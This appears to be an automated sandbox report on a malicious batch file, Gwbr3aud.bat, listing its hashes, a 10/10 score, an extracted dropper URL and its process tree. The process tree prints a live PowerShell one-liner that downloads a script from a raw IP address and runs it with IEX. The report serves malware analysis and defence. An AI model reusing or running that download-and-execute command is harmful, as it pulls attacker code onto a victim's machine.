Analysis
max time kernel: 114s
max time network: 110s
platform: windows10_x64
resource: win10v200217
submitted: 25-03-2020 12:10
Static task: static1
Behavioral task: behavioral1
  Sample: Gwbr3aud.bat
  Resource: win7v200217 (windows7_x64)
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: Gwbr3aud.bat
  Resource: win10v200217 (windows10_x64)
  0 signatures, 0 seconds
General
Target: Gwbr3aud.bat
Size: 189B
MD5: bedcf382904ffd9d90787b2dd3ad81a2
SHA1: 56128ffdde214dd351e2f1c0be362a632d065aa7
SHA256: 051c9112f4294354c647723d8645889eaf36dc198a7e28fbe2f6e229da623a00
SHA512: e52d5ce4f80d49034e5429e2c0ebec13e8a9c10b467c3368b1042136f810098cb1ea4d238230c82082025c20c8f54ed69dcbe99df5048d03d95af103100a0a3b
Score: 10/10
Malware Config
Extracted
Language: ps1
Source: ps1.dropper
URLs: http://185.103.242.78/pastes/Gwbr3aud
Signatures

Program crash (1 IoC)
Processes:
  pid   pid_target  process       target process
  3820  4020        WerFault.exe  powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
  description                pid   process
  Token: SeRestorePrivilege  3820  WerFault.exe
  Token: SeBackupPrivilege   3820  WerFault.exe
  Token: SeDebugPrivilege    3820  WerFault.exe

Suspicious behavior: EnumeratesProcesses (14 IoCs)
Processes:
  pid   process
  3820  WerFault.exe  (14 identical entries)
Processes
1. C:\Windows\system32\cmd.exe
   Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Gwbr3aud.bat"
   PID: 4000
   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/Gwbr3aud');Invoke-BQBBOZ;Start-Sleep -s 10000"
      PID: 4020
      3. C:\Windows\SysWOW64\WerFault.exe
         Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4020 -s 704
         Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses
         PID: 3820